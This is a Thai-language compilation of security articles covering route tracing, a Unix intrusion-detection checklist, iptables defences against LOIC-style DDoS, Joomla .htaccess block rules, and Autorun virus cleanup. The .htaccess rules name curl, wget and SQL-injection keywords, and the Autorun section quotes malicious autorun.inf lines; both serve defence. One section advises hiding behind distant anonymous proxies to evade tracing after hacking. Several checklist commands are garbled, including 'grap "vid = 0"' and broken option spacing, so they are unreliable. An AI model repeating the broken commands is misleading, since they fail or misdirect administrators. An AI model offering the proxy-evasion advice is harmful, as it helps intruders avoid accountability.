http://www.alldomains.com/ ของ US โดยเฉพาะ http://www.usps.gov/ncsc/lookups/abbr_state.txt ผู้ที่ใช้วินโดวส์สามารถแปลงไอพีให้เป็น hostname ได้โดยการดาวน์โหลดยูทิลิตี้ที่ชื่อ Samspade จาก http://www.samspade.com/ หรือใช้วิธีที่ง่ายกว่า ( แล้วทำไมไม่บอกแต่แรกฟะ - -“ แล้วมันจะน่าอ่านเหรอ 5 5 5 ) C:\windows>tracert IP หรือ Hostname
เช่นถ้าผมลองแบบนี้นะ
C:\windows>tracert 203.94.12.54

Tracing route to 203.94.12.54 over a maximum of 30 hops

1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms
8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms
ผลลัพธ์ข้างบนแสดงให้เราเห็นถึงเส้นทางที่ข้อมูลได้เดินทางผ่านไปดังนี้:
Netzero (ไอเอสพีที่ส่งข้อมูลออกไป) ---> Spectranet (A Backbone Provider) ----->New York ISP
--->New York Backbone -> Asia --> South Asia -> India Backbone --> New Delhi Backbone
--> Another router in New Delhi Backbone ---> New Delhi ISP
แสดงให้เห็นถึงสถานที่อยู่ของผมจริง ๆ ที่เป็น: นิวเดลลี, อินเดีย, เอเชียใต้
เอา ล่ะทีนี้รู้ยังว่า พวก FBI,NSA เค้าตามรอยได้ไง นี้เป็นเพียงวิธีที่ง่ายๆ คิดดูขนาด โง่ๆ อย่างผมยังรู้เลย แล้วพวกมืออาชีพอย่างพวกคุณแหละใช้วิธีไหน

Have I been Hacked

ที่มา : http://www.sans.org
เรียบเรียงโดย : ร.อ. วิวัต เรืองมี
เรียบเรียงเมื่อ : 20 สิงหาคม 2544

หลังจาก hacker ได้ทำการ compromise ระบบแล้วนั้น ส่วนใหญ่ hacker จะไม่ทำการลบข้อมูลหรือทำอะไรที่จะเป็นผลเสียต่อระบบของท่าน แต่ hackers จะทำการติดตั้ง back door ในระบบซึ่งทำให้ hacker สามารถเข้าถ้าระบบในฐานะ root หรือบางที hacker อาจใช้ระบบของท่านในการโจมตีระบบอื่นๆต่อไป

เพราะฉะนั้นหากท่านประสบปัญหาอย่างเช่น ระบบของท่านเกิดช้าขึ้นมาอย่างผิดปกติแต่เมื่อท่านได้ทำการตรวจสอบ disk space และ process แล้วก็ไม่มีสิ่งใดผิดปกติ checklist ต่อไปนี้คือสิ่งที่ท่านควรตรวจสอบเพื่อบอกว่าระบบของท่านถูก hacked หรือไม่

1. เหตุการณ์หรือสัญญาณที่ผิดปกติ

ถ้าท่านไม่สามารถทำการ ssh, telnet หรือ login เข้าสู่เครื่องได้เป็นสิ่งบอกเหตุว่าท่านอาจจะถูก hacked ได้
ท่านควรจะทำการตรวจสอบเหตุต่างๆ ที่ไม่สามารถอธิบาย เช่น network ซึ่งผิดปกติ resource ถูกใช้ไปเยอะมากทั้งที่มี users เข้าใช้อยู่เพียงไม่กี่คน
ควรตรวจสอบ /etc/password file ว่ามี account ใดบ้างที่เพิ่งถูกเพิ่มเข้ามาโดยที่คุณไม่ได้ทำการเพิ่มเอง รวมทั้งตรวจสอบ accounts ที่ไม่มี password หรือ UID ถูก set ให้เท่ากับ "0"
2. ตรวจหา sniffer


เนื่องจาก sniffer จะทำให้ network interface รับ packet ทุกชนิดที่เข้ามาและทำการบันทึก packet ซึ่งประกอบด้วย username และ password ของ ftp และ telnet แม้ว่าท่านจะแก้ปัญหานี้โดยการใช้ switching แทน hub แต่ถ้าเครื่องดังกล่าวเป็น Internet gateway แล้วปัญหาก็ไม่ได้หมดไป ท่านสามารถทำการ check promiscoous mode ได้โดย # ifconfig - a/grep PROMISC


แต่มี rootkit บางตัวที่ทำการเปลี่ยนแปลง ifconfig เพื่อหลบซ่อนจากการใช้ parameters นี้ เพื่อความแน่ใจให้ท่าน run antisniff (http://www.securitysoftwaretech.om/antisniff/) จาก remote machine

3. ตรวจสอบ logs

ทำการตรวจสอบ log files โดยการใช้คำสั่ง last เพื่อที่จะ list logins ท้ายๆออกมาแล้วตรวจสอบว่ามี unknown users หรือ usernames ที่แปลกๆหรือไม่ รวมทั้ง access time ของแต่ละ user ด้วยว่ามีความผิดปกติหรือไม่

# last | head

ตรวจสอบ message file ใน /var/log/ (สำหรับ Linux) หรือ /var/adm/ (สำหรับ Solaris)
รวมทั้งตรวจสอบ log files อื่นๆ ซึ่งใช้โดย syslog (โดยดูจาก /etc/syslog.conf) โดยการ grep su failures ทั้งหลายและเหตุการณ์ที่ vid = 0

# grap "vid = 0" /var/log/
และ
# grep "su" /var/log/


log files ซึ่งมีขนาดเท่ากับ "0" ก็อาจเป็นสัญญาณของการถูกบุกรุกเช่นเดียวกัน
เนื่องจาก rootkit ใหม่ๆ จะทำการลบ usermane จาก wtmp, utmp และ lastlog files เพราะฉะนั้นหากท่านไม่ได้ใช้อุปกรณ์ที่เรียกว่า write once read many เช่น CD-R ในการบันทึก log files ท่านไม่ควรไว้ใจ log files เท่าใดนัก
4. ไม่ควรเชื่อ ps command

ตรวจสอบชื่อและจำนวนของ running processes และพยายามหา processes ที่ไม่ค่อยคุ้น ข้อแปลกๆ หรือ startup time ที่ไม่ค่อยปกติ รวมทั้ง process ที่ใช้ CPU time มากๆอย่างไรก็ตามโดยปกติแล้วผู้บุกรุกจะ run sniffers อยู่ภายใต้ daemon ปกติ เช่น sendmail หรือ named และ rootkits โดยส่วนใหญ่ก็จะทำการเปลี่ยนแปลง ps และ pidof เพื่อที่จะหลบซ่อน process ของพวกเขา ดังนั้นท่านควรจะเปรียบเทียบระหว่างผลลัพธ์ของ ps กับผลลัพธ์ใน /proc เช่น

#ps --no-headers -ef | wc

เมื่อท่าน run คำสั่งต่อไปนี้ใน RedHat 7.0 # ps - -no- headers- ef | wc แล้วผลต่างกันกับที่ run # ls - d /proc/ [0-9]* นั่นคืออาจมี process ที่แอบซ่อนอยู่
ในระบบ Solaris อาจใช้คำสั่ง crash เพื่อที่จะแสดง list ของ processes แล้วเปรียบเทียบกับ ps output
violin $ crash dumpfile = /dev/mem, namelist = /dev/ksyms, outfile = stdout > proc
หรือท่านอาจจะติดตั้งและ run Isof [ftp://vic.cc.purdue.edu/pub/tools/] ซึ่งโปรแกรมนั้นจะบอกท่านว่า process ไหนกำลังใช้ files อะไร

5. ตรวจสอบ ports

ทำการ scan ports ของเครื่องโดยใช้ port scanner เช่น nmap [http://www.insecure.org/nmap/] ซึ่งค่า defaults ของ nmap นั้นคือ port1-1024 แต่ trojan horses ส่วนใหญ่จะใช้ ports ที่สูงกว่านั้น หากท่านต้องการเฉพาะเจาะจง ports ที่ต้องการจะ scan ให้ใช้ option-p เช่น


# nmap - p 1 - 65535 your_machin_address
หลังจากนั้น ให้ทำการใช้คำสั่ง netstat -a เพื่อตรวจสอบ port ที่เปิดอยู่บนเครื่องนั้นๆ
# netstat -a

หากพบว่ามี ports ที่ปรากฎใน output ของการใช้ nmap แต่ไม่ปรากฎใน output เมื่อใช้คำสั่ง netstat นั้นอาจหมายถึง netstat ได้ถูกเปลี่ยนแปลงเพื่อหลบซ่อน service บางอย่าง

6. ตรวจสอบ binaries

rootkits ส่วนใหญ่จะทำการเปลี่ยนแปลง system binaries เพื่อทำการหลบซ่อน file, sniffer หรือ port ที่ถูกเปิดอยู่ บน RedHat ท่านสามารถตรวจสอบ binaries ได้โดยใช้คำสั่ง


altis $ rpm - va | grep '1...5'
ซึ่งผลลัพธ์ที่เกิดขึ้นอาจเป็นลักษณะนี้คือ
s.5.....T c/etc/services
s.5....T c/etc/info-dir
s.5....T c/etc/inetd.conf
นั้นหมายถึงขนาดของ file เปลี่ยน (5)
MD5 checksum เปลี่ยน (5)
และเวลาที่ได้รับการเปลี่ยนแปลงถูกเปลี่ยน (T)

บนระบบซึ่งเป็น UNIX ท่านสามารถใช้คำสั่ง find ค้นหา files ที่ถูกเปลี่ยนแปลงในช่วงเวลาหนึ่งๆ ส่วน option ที่ใช้น่าจะใช้ -ctime option ดังนี้

# find/ bin -ctime -7

แต่วิธีที่ดีที่สุดคือใช้คำสั่ง cmp แล้วเปรียบเทียบ วันที่ ขนาดของไฟล์ และ time-stamp ของ system files กับ machine ที่เป็น clean machine และใช้ OS ประเภทเดียวกันซึ่งโดยปกติ binaries files ที่ถูกเปลี่ยนคือ

chsh, crontab, du, df, find, ifconfig, inedd, killall, login, ls, netstat, passwd, ps, sshd, syslogd และ top

ท่านสามารถใช้โปรแกรม tripwire หรือ samhain เพื่อให้แจ้งเตือนเมื่อ system files ถูกเปลี่ยนแปลง

Tripwire [ http://www.tripwire.org]
samhain [http://samhain.sourceforge.net]


7. ตรวจสอบ Config Files

ท่านควรตรวจสอบ files ซึ่งถูกเปลี่ยนแปลงบ่อยๆได้แก่

/etc/inetd.conf file
หรือ
/etc/xinetd.conf file
หรือ
/etc/xinetd.d directory

พยายามตรวจดู service ที่เพิ่มเข้ามา ถูกเปลี่ยนแปลงหรือเป็น service ที่ท่านไม่คุ้นเคย


/etc/hosts.eguiv, ~/.rhosts

พยายามตรวจดู creationdate และ "+" รวมทั้ง host names ที่ท่านไม่คุ้นเคย

/dev/* เนื่องจากมี rootkits บางประเภทที่จะติดตั้ง configuration files ใน /dev/ ท่านสามารถตรวจสอบ text files ใน /dev directory ได้ดัวนี้

# file /dev/* | grep text
/ dev/ ptyp : ASCIItext
/ dev/ ptyq : ASCIItext
/ dev/ ptyr : ASCIItext


จากตัวอย่างนี้ท่านจะเห็นว่า rootkit ได้ใช้ text file ptyr เพื่อจะหลบซ่อนจาก command lsใช้ ptyq เพื่อจะลบ sockets/ addresses ออกจาก netstat และใช้ ptyq เพื่อจะลบ processes ออกจาก ps

ในฐานะ root ให้ท่าน run crontab - l and atq เพื่อตรวจดูว่ามีโปรแกรมใดที่กำลังรอการทำงานอยู่หรือไม่

8. ตรวจสอบ setuid, setgid และไฟล์อื่นๆที่หลบซ่อนอยู่

ทำ setuid และ setgid files จะ run อยู่ในฐานะ root แม้ว่าจะถูก executed โดย user ธรรมดาก็ตาม
หากท่านต้องการค้นหา setuid files ให้ใช้คำสั่ง

# find / - perm -4000 -print

และในการค้นหา setgid ให้ใช้คำสั่ง

# find / -perm -2000 -print

โดยปกติแล้วผู้บุกรุกจะแอบซ่อน setuid files และ tools ท่านไว้ใน hidden directories ท่านสามารถตรวจสอบหา files ที่แอบซ่อนอยู่ได้โดยใช้คำสั่ง find

# find / -name " . * "

หรือบางทีผู้บุกรุกจะเลือก directory ไปในการแอบซ่อน files เช่น ~/ gnome, ~/.xauth เหล่านี้เป็นต้น

สรุป

หากท่านคิดว่าท่านถูก hacked แน่นอนแล้ว ให้ทำการ disconnect จาก network ทันทีและทำการ back up data แล้ว reinstall OS หรือว่าหากท่านไม่สามารถปิดระบบได้ทันทีก็ควรจะเปลี่ยน root password, ลบ user account ที่คิดว่าเป็นอันตรายและทำการ set เวลาที่จะปิดระบบหลังทำการ reinstall OS

how to fix doS attacK

หลัง จากมีการโจมตีเว็บไซด์ต่างๆที่ไม่ร่วมกับ Wikileaks เมื่อเดือนที่แล้ว ด้วยวิธี DDoS ออกมา  ก็ทำให้คนเริ่มวิตกและพยายามหาวิธีป้องกันกันต่างๆ  และบทความสั้นๆนี้ก็เป็นอีกบทความหนึ่งที่เป็นวิธีการป้องกันซึ่งใช้ IPTABLES เป็นตัวป้องกันครับ

iptables -A INPUT -p tcp --dport 80 -m hashlimit --hashlimit-upto 50/min \

--hashlimit-burst X --hashlimit-mode srcip --hashlimit-name http -j ACCEPT

iptables -A INPUT -p tcp --dport 80 -j DROP

Preventing Layer 7 DDoS Attack

WikiLeaks, th3j35t3r, LOIC are words that have been well known in the last period by the infosec community. These words get me directly thinking about the Application‐level DDoS attacks on websites such as Twitter, VISA, and MasterCard. Usually the attack involves large number for HTTP/HTTPS requests to specific sections of the website that could potentially be resource intensive for the server to process.

LOIC (Low Orbit Ion Cannon) is an Open Source tool that has been used by anonymous group against governmental websites and mail servers, the main purpose of these attacks is to launch a distributed denial of service against a website and make them offline.
There are already other similar tools that may perform this attack to stop any website and make it unreachable for legitimate users. By looking at the technique used to perform this attack the tool send about 10 Long HTTP/HTTPS requests per second till it reach bandwidth or connection limits of hosts or networking equipment to make it offline . Now the question is how we can stop this attack? What are the preventive measures against the Layer7 DDoS?
First of all we start limiting the traffic using hashlimit on iptables this module can be used to allow just a certain number of packets per minute:

iptables -A INPUT -p tcp --dport 80 -m hashlimit --hashlimit-upto 50/min \

--hashlimit-burst X --hashlimit-mode srcip --hashlimit-name http -j ACCEPT

iptables -A INPUT -p tcp --dport 80 -j DROP

X is the number of connection so you can expect that the DDoS tool will send approximately 600 Long requests per minute so you need to make it less and as a result the firewall will Drop the connection ( do not also forget to change the port 80 according to the service that are provided from your facilities).
Now if you are using Apache you can add Module mod_reqtimeout this directive can set various timeouts for receiving the request headers and the request body from the client. If the client fails to send headers or body within the configured time, a 408 REQUEST TIME OUT error is sent.
A final important note is to stop the Hive which is used as the command-and-control server to send instructions regarding different target, so if you stop the Hive each person will be launching the attack separately and can stop the DDoS.

Source: http://www.sectechno.com/2011/01/25/preventing-layer-7-ddos-attack/

พรางตัวของทั่วๆไป มี 3 วิธี

1. การพรางตัวโดยการเชื่อมต่อกับอินเตอร์เน็ต ISP โดยใช้วิธีหมุนโมเด็ม ซึ่งจะทำให้ รย ที่ได้ในแต่ละครั้งเปลี่ยนไป (ยกเว้นการเชื่อมต่ออินเตอร์เน็ตแบบพิเศษ เช่น Leased Line ซึ่งไอพีที่ได้จะคงที่) ในเบื้องต้นปลายทางสามารถรู้ว่าเรามาจาก ISP รายไหน (เพราะเอาไอพีไปตรวจสอบได้) แต่ยังไม่รู้ว่ามาจากไหน ถ้าหากเกิดเรื่องร้ายแรงจริงๆก็สสามารถตรวจสอบได้อยู่ดี เพราะ ISP เกือบทุกแห่งจะบันทึกหมายเลขโทรศัทพ์ที่หมุนเข้า แค่ทราบวันที่ เวลาที่เกิดเหตุ ก็ยังพอที่จะตามตัวได้อย่างไม่ยากนัก

2. ใช้เน็ตผ่านอินเตอร์เน็ตคาเฟ่หรือสาธารณะ วิธีนี้นิยมใช้กันพอสมควร เพราะในแต่ละวันจะมีคนผลัดกันใช้งานกันอย่างมากมาย การย้อนหาตัวผู้ใช้จึงเป็รเรื่องที่ยากมาก หากไม่ได้บันทึกข้อมูลเอาไว้ ดังตัวอย่างที่เคยเป็นข่าวว่าเซิฟเวอร์ขององกรณ์แห่งหนึ่งในสหรัฐฯ ถูกแฮค และจากการตรวจสอบ IP พบว่ามาจาก คอมเครื่อวหนึ่งที่อยู่ในมหาวิทยาลัยธรรมศาสตร์ ศูนย์รังสิตระหว่างการแข่งขันเอเชี่ยนเกมส์

3. ใช้ Proxy บังตัวเอง วิธีนี้ป็นที่นิยมและได้ผลมากที่สุด เพราะทำให้การติดตามหรือย้อนรอยกลับหาตัวแฮคเกอรทำได้ยากมากขึ้น นหือจะไม่ได้เลย ซึ่งผมจะมาอธิบายในเนื้อหาของส่วนนี้

Proxy เอาไว้ทำอะไร
Proxy คือเซิฟเวอร์อย่างหนึ่ง เขาคิดขึ้นมาเพื่อช่วยให้การใช้อินเตอร์เน็ตโดยเฉพาะการเปิดหน้าเว็บเร็ว ขึ้น เพราะ Porxy จะเป็นตัวนายหน้าในการดึงข้อมูลต่างๆ ที่เราต้องการ แล้วนำข้อมูลไปเก็บไว้ในเซิฟเวอร์ เมื่อเราหรือผู้ใช้รายอื่นๆ ที่ใช้ Proxy เดียวกันต้องการข้อมูลเดิมอีกครั้ง Proxy ก็จะนำข้อมูลที่มีอยู่ในเซิฟเวอร์ให้โดยไม่ต้องออกไปดึงข้อมูลใหม่อีกรอบให้ เสียเวลา

เนื่องจาก Proxy จะทำหน้าที่ดึงข้อมูลแทนเรา ดังนั้นไอพีที่ปรากฏอยู่ใน Log ไฟล์หรือไอพีปลายทางมองเห็นจะเป็นของ Proxy ด้วยเหตุผลนี้ จึงใช้ Proxy  ในการบังตัวเองจากไอพีที่แท้จริง โดยที่ไม่ได้ต้องการใช้เน็ตให้เร็วขึ้น

การตรวจสอบไอพีที่ข้างนอกมองเห็น
สามารถเข้าไปตรวจสอบได้ที่ ที่นี่ แล้วสังเกตุที่ Your IP Address Is: แล้วเป็นตัวเลข นั้นแหละคือไอพีของตัวเอง

ประเภทของ Proxy 




ซึ่งเราสามารถตรวจสอบไอพีทั้ง 3 แบบได้ที่ ทีนี่ ถ้าไม่มีไอพีเราติดไปก็ถือว่าผ่าน

ดังนั้นประเภทขของ Proxy ที่ปลอดภัยที่สุดมี 3 แบบ คือ Anonymous , Distorting , High Anonymous(Elite) และไม่ควรเลือก Proxy ในประเทศไทย เพราะไม่ปลอดภัยอย่าง ถ้าให้ดีเลือกให้ไกลที่สุดยิ่งดี

เว็บที่ให้บริการ Proxy สาธารณะ
www.proxz.com
www.proxy4free.com
www.publicproxyservers.com
www.0privacy.com

หลักการตรวจสอบ Proxy ว่ามีอยู่จริงหรือไม่
Start > Run > พิมพ์ Ping ตามด้วยไอพี แล้วคลิก OK
ถ้าไอพีไม่มีตัวตนจะขึ้น Request time out ตลอด
ถ้ามีตัวตนจะขึ้นว่า Reply form ....................

 

 การตั้งค่า Proxy

1. เปิดโปรแกรม Internet Explorer

2. คลิกเลือกเมนู Toos เลือก Internet Options

3. คลิกเลือก Tab Connections

4. คลิกเลือก Lan setting

5. ทำเครื่องหมายถูกที่ตัวเลือก Use a proxy server .....

6. ในช่อง Address ใส่หมายเลขไอพี Proxy

7. ในช่อง Port ใส่หมายเลขพอร์ต Proxy

8. ทำเครื่องหมายถูกที่ตัวเลือก By pass Proxy....

9. กดปุ่ม ok >ok

10. ทดสอบเข้าอินเตอร์เน็ต

ถ้าไม่ใช้ก็ให้ลบไอพีออกแล้วเอาขีดถูกออกที่ Use a proxy server ..... แล้วคลิก OK > OK

 
 

 ตั้งค่า Proxy ใน Firefox

เลือกที่ Tools --> Options
คลิกที่แท็บ Advance เลือกที่แท็บ Network แล้วคลิกที่ Setting
ก็จะเจอหน้าจออย่างในภาพที่เห็นครับ



ให้ ติ้กถูกที่ Manual Proxy configuration
ในช่อง HTTP Proxy ก็ใส่หมายเลข IP Proxy ลงไปครับ Port Proxy ก็ใส่เลข
พ็อตที่เราต้องการใช้ลงไปครับ หลังจากนั้นก็กด OK ก็เสร็จครับ

มาป้องกันการโดนแฮก Joomla! ด้วย jHackGuard

การโดนแฮกเป็นสิ่งไม่น่าพิศมัยนัก ถ้าเราป้องกันได้ก็จะอุ่นใจได้บ้าง การโดนแฮกสามารถโดนได้หลายทาง เช่น

• ไปติดโทรจันมาจากเว็บอื่น แล้วโดนขโมยข้อมูล Ftp ของเว็บ
• ใช้จูมล่า แล้วไม่อัพเดต เป็นรุ่นใหม่ หรือ ลงคอมโพเน้น โมดูลไป ไม่ตามอัพเดต ก็เป็นช่องทางให้ Hacker เข้ามาเจาะระบบได้
• Hosting ที่ใช้มีการตั้งค่าที่ไม่ปลอดภัย

วันนี้จะมาแนะนำ plugin ของ joomla! ชื่อ  jHackGuard ของ เว็บ SiteGround ซึ่ง เขียนมาจากประสบการณ์ที่เขาดูแลเว็บที่เป็นจูมล่าบนโฮสเขาเองซึ่ง jHackGuard จะเป็นด่านป้องกันเว็บที่ทำด้วยจูมล่า
ป้องกันอะไรบ้าง

• SQL Injections
• Remote URL/File Inclusions
• Remote Code Executions
• XSS Based Attacks!

การติดตั้ง
เมื่อติดตั้งเสร็จก็ เปิดใช้งานแค่นี้ครับ ได้แล้ว
โหลดได้ที่ http://extensions.joomla.org/extensions/access-a-security/site-security/site-protection/13233?qh=YToxOntpOjA7czoxMDoiamhhY2tndWFyZCI7fQ%3D%3D

หรืออยากได้เร็ว
http://www.colorpack.net/images/jhackguard.zip

แถม เพิ่มความมั่นใจอีกชั้นด้วย การป้องกันที่ .htaccess เพิ่ม code ลงไป ที่ไฟล์ .htaccess หลังจากบันทัดที่มีคำว่า
########## End - Joomla! core SEF Section
เพิ่ม code ด้านล่างลงไป
ServerSignature Off
RewriteCond %{REQUEST_METHOD}  ^(HEAD|TRACE|DELETE|TRACK) [NC,OR]
RewriteCond %{THE_REQUEST}     ^.*(\\r|\\n|%0A|%0D).* [NC,OR]

RewriteCond %{HTTP_REFERER}    ^(.*)(<|>|’|%0A|%0D|%27|%3C|%3E|).* [NC,OR]
RewriteCond %{HTTP_COOKIE}     ^.*(<|>|’|%0A|%0D|%27|%3C|%3E|).* [NC,OR]
RewriteCond %{REQUEST_URI}     ^/(,|;|:|<|>|”>|”<|/|\\\.\.\\).{0,9999}.* [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^(java|curl|wget).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(libwww-perl|curl|wget|python|nikto|scan).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|’|%0A|%0D|%27|%3C|%3E|).* [NC,OR]

#Block mySQL injects
RewriteCond %{QUERY_STRING}    ^.*(;|<|>|’|”|\)|%0A|%0D|%22|%27|%3C|%3E|).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC,OR]

RewriteCond %{QUERY_STRING}    ^.*(localhost|loopback|127\.0\.0\.1).* [NC,OR]
RewriteCond %{QUERY_STRING}    ^.*\.[A-Za-z0-9].* [NC,OR]
RewriteCond %{QUERY_STRING}    ^.*(<|>|’|%0A|%0D|%27|%3C|%3E|).* [NC]

RewriteCond %{QUERY_STRING} proc\/self\/environ [OR]
บทความดีๆจาก http://www.colorpack.net

วิธีแก้ไวรัส Autorun เบื้องต้น

บทแรก ว่าด้วยอาการของเครื่องที่ติดไวรัส
วิธีดูคือ
1.รู้สึกว่าเครื่องช้าลงไหม
2.เปิด TaskManager ได้ไหม (วิธีดูคือ กด CTRL+ALT+DELETE ถ้ามันบอกว่าโดนปิดโดย Admin คือเข้าไม่ได้)
3.เปิด Regedit ได้ไหม (วิธีเข้าคือ เข้า Start ไปที่ Run แล้วพิมพ์ regedit ถ้ามันบอกว่าโดนปิดโดย Admin คือเข้าไม่ได้)
4.Folder Option ยังอยู่ไหม (วิธีดูคือ เข้า MyComputer ไปที่ Tools(อยู่ข้างล่าง Title Bar) ดูว่ามี Folder Option ไหม)
5.มี Process แปลกๆในเครื่องไหม (ดูใน TaskManager ส่วนรายละเอียดจะอธิบายในบทต่อไป)
6.เปิด Drive ได้ไหม(หมายถึงปกติคือ Double Click เข้าไปได้ไหม)
7.เมื่อเปิด Folder แล้วเปิด Folder นั้นในหน้าต่างใหม่
8.ใน Folder มี Folder ที่ชื่อเหมือน Folder ขึ้นมาโดยเราไม่ได้สร้าง
9.มี PopUp ข้อความ หรือ หน้าต่างของ InternetExplorer(หรือ InternetBrowser อื่นๆ) ขึ้นมาเอง
10.หน้าแรกถูกตั้งเป็นหน้าอื่น เปลี่ยนกี่ทีก็ไม่ได้
11.มี File แปลกๆอยู่ในเครื่องรึเปล่า
12.อื่นๆ ถ้านึกออกจะเอามาลงอีก
หมายเหตุ Process คือโปรแกรมที่ถูกเปิดอยู่ทุกตัวซึ่งบ้างตัวจะทำงานในเบื้องหลัง(มองไม่เห็น)

บทที่สอง ว่าด้วยวิธีดู Process แปลกๆ
วิธีเปิด TaskManager เพื่อดู Process
1.กด CTRL+ALT+DELETE ถ้ามันบอกว่าโดนปิดโดย Admin คือว่ามีโอกาศเกือบ 100% ว่าติดไวรัส
2.ไปที่ Process

วิธีดู Process แปลกๆ
1.ถ้ามี wscript.exe ขึ้นมา (อันนี้ 90% เป็นไวรัส)
2.มีตัวที่มีรายชื่อดังต่อไปนี้มากกว่า 1 ตัวหรือชื่อใกล้เคียง
alg.exe
ctfmon.exe (อันนี้ไม่แน่ใจว่ามีทุกเครืองไหม แต่เป็นของ Windows คงมีทุกเครื่อง)
lsass.exe
services.exe
smss.exe
spoolsv.exe
winlogon.exe(ในกรณีที่เป็น server อาจจะมีมากกว่า 1 ตัวมั้ง ไม่แน่ใจแต่ถ้ามี 2 ตัวให้ดูที่ User Name ถ้าเป็น System คือปกติ)
3.มีตัวที่ชื่อใกล้เคียงกับ svchost.exe หรือเป็นชื่อนี้แต่ User Name ไม่ใช่ NETWORK SERVICE,LOCAL SEVICE หรือ SYSTEM

วิธีปิด Process
1.เลือก Process ที่ต้องการปิด
2.กดที่ End Process
3.แล้วกดที่ Yes
คำเตือน การปิด Process ที่มี User Name เป็น NETWORK SERVICE,LOCAL SEVICE หรือ SYSTEM ไม่ใช่ความคิดที่ดีอาจจะทำให้เครื่องรวนได้ ในบางกรณีอาจจะ Restart เองเลย
หมายเหตุ บาง Process อาจจะปิดไม่ได้เนื่องจากถูกป้องกันไว้ ส่วนมากจะเป็น AntiVirus เช่น NOD32,NetOP School Student เป็นต้น

บทที่สาม ว่าด้วยเรื่องของ Autorun.inf
Autorun.inf คืออะไร
Autorun.inf คือ File ที่ไวรัสใช้ในการรันโปรแกรมไวรัส(บางตัวอาจจะไม่ใช่ไวรัสนะครับ อาจจะใช้ในประโยชน์อื่น เช่นการเปิดตัวลงโปรแกรมทันทีที่ใสแผ่น CD,เปลี่ยน Icon ของไดรว์ต่างๆ เป็นต้น

วิธีเปิด Autorun.inf
ในกรณีที่มองเห็นให้ Double Click เปิดได้เลย
ในกรณีที่มองไม่เห็นให้เปิด NotePad แล้วไปที่ File > Open แล้วพิมพ์ลงในช่อง File Name ว่า ชื่อไดรว์ตามด้วย Autorun.inf เช่น

F:\Autorun.inf

หมายเหตุ ในที่นี้เราจะดู Autorun ที่ Drive F:

ข้อความใน Autorun.inf ใช้ทำอะไร

[Autorun]

ตัวนี้คือตัวที่บ่งบอกว่าตัวนี้คือ Autorun.inf ตัว Autorun.inf ทุดตัวต้องมี

icon=

ตัวนี้เป็นตัวที่ใช้เปลี่ยน Icon ของ ไดรว์ ส่วนมากไวรัสจะไม่ใช้
ตัวอย่างวิธีใช้

icon=Sakura.ico

โดย Sakura.ico คือชื่อไฟล์ Icon
หมายเหตุ File Icon ต้องเป็น File ที่มีนามสกุล .ico เท่านั้น และมีขนาด 32 * 32 pixel เท่านั้น(บางอันอาจจะได้ถึง 64*64 pixel)

shellexecute=

อันนี้ส่วนมากเป็นไวรัสชนิดที่เป็น VBScript หรือ Script ต่างๆ
ส่วนมากมักเป็น

shellexecute=wscript.exe test.vbs

การทำงานของคำสั่งนี้คือบอกให้รัน Script ที่ชื่อว่า test.vbs ปกติไวรัสแบบนี้แก้ไม่ยาก

Open=

อันนี้ส่วนมากจะใช้กับไวรัสที่เป็น EXE
โดยมักเป็นดังนี้

Open=1.exe

หรือ

Open=1.com

โดยที่ 1.exe หรือ 1.com นั้นเป็นชื่อไวรัส ส่วนมากไวรัสพวกนี้มักแก้ยากเพราะเราไม่รู้ว่ามันทำอะไรกับเครื่องเราบ้าง

Shell\auto\command=
Shell=auto

อันนี้คล้ายกับ Open ผมจะอธิบายทีละบรรทัดนะครับ

Shell\auto\command=

บรรทัดนี้จะเป็นตัวชี้ File ว่าให้เปิดอะไร ส่วนตรง auto นั้นสามารถเปลี่ยนได้ เช่น

Shell\test\command=

จะเหมือนกับอันบน คำสั่งนี้เมื่อคลิกขวาที่ Drive จะมีคำสั่งเพิ่มขึ้นมา เช่นถ้าเป็นของอันบนจะมีคำสั่ง auto เพิ่มขึ้นมา แต่ถ้าของอันล่างจะมี test เพิ่มขึ้นมา

Shell=auto

ส่วนอันนี้เป็นตัวที่บอกว่าถ้า Double Click จะไปเปิดตัวไหน เช่นอันนี้คือถ้า Double Click จะคล้ายคลิกขวาที่ Drive แล้วเลือก auto ก็คือรันไวรัสนั่นเอง บางตัวอาจจะใช้วิธีนี้แต่ผมจำโครงสร้างไม่ได้เป็นตัว music.exe มันจะทำให้มี Open หลายตัวทำให้งง ถ้าในกรณีนี้ให้เลือกตัวล่าง ส่วนมากตัวล่างมักจะปลอดภัยที่สุด

label=

อันนี้คือตั้งชื่อ Drive อ่ะครับ เช่น

label=MIX THE WIZARD

อันนี้คือให้ชื่อ Drive เป็น MIX THE WIZARD มันไม่ต่างอะไรกับคลิกขวา Properties แล้วเปลี่ยนชื่อไดรว์เท่าไหร่ แต่ถ้ามี autorun.inf อยู่มันจะเอาคำสั่งนี้เป็นหลัก
ที่สำคัญคงมีแค่นี้

ทริกเพิ่มเติม
1.เราควรสร้าง Autorun.inf เก็บไว้ใน FlashDrive แล้วใส่คำสั่ง Icon เข้าไป ประมาณนี้

[Autorun]
icon=Sakura.ico

label=No Virus

